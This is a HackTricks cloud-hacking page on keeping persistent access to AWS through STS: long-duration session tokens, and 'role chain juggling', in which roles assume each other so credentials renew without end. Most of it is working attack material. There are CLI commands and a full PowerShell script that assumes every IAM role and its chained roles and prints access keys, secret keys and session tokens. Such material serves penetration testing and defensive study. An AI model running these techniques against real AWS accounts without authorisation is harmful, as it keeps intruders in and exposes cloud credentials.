AWS - STS Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

STS

For more information access:

AWS - STS Enum

Assume role token

Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.

aws sts get-session-token --duration-seconds 129600

# With MFA
aws sts get-session-token \
    --serial-number <mfa-device-name> \
    --token-code <code-from-token>

# Hardware device name is usually the number from the back of the device, such as GAHT12345678
# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username

Role Chain Juggling

Role chaining is an acknowledged AWS feature, often utilized for maintaining stealth persistence. It involves the ability to assume a role which then assumes another, potentially reverting to the initial role in a cyclical manner. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.

You can use this tool to keep the role chaining going:

./aws_role_juggler.py -h
usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]

optional arguments:
  -h, --help            show this help message and exit
  -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]

Note that the find_circular_trust.py script from that Github repository doesn't find all the ways a role chain can be configured.

Code to perform Role Juggling from PowerShell

# PowerShell script to check for role juggling possibilities using AWS CLI

# Check for AWS CLI installation
if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
    Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
    exit
}

# Function to list IAM roles
function List-IAMRoles {
    aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
}

# Initialize error count
$errorCount = 0

# List all roles
$roles = List-IAMRoles | ConvertFrom-Json

# Attempt to assume each role
foreach ($role in $roles) {
    $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
    try {
        $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
        if ($credentials) {
            Write-Host "Successfully assumed role: $($role.RoleName)"
            Write-Host "Access Key: $($credentials.AccessKeyId)"
            Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
            Write-Host "Session Token: $($credentials.SessionToken)"
            Write-Host "Expiration: $($credentials.Expiration)"

            # Set temporary credentials to assume the next role
            $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
            $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
            $env:AWS_SESSION_TOKEN = $credentials.SessionToken

            # Try to assume another role using the temporary credentials
            foreach ($nextRole in $roles) {
                if ($nextRole.Arn -ne $role.Arn) {
                    $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
                    try {
                        $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
                        if ($nextCredentials) {
                            Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
                            Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
                            Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
                            Write-Host "Session Token: $($nextCredentials.SessionToken)"
                            Write-Host "Expiration: $($nextCredentials.Expiration)"
                        }
                    } catch {
                        $errorCount++
                    }
                }
            }

            # Reset environment variables
            Remove-Item Env:\AWS_ACCESS_KEY_ID
            Remove-Item Env:\AWS_SECRET_ACCESS_KEY
            Remove-Item Env:\AWS_SESSION_TOKEN
        } else {
            $errorCount++
        }
    } catch {
        $errorCount++
    }
}

# Output the number of errors if any
if ($errorCount -gt 0) {
    Write-Host "$errorCount error(s) occurred during role assumption attempts."
} else {
    Write-Host "No errors occurred. All roles checked successfully."
}

Write-Host "Role juggling check complete."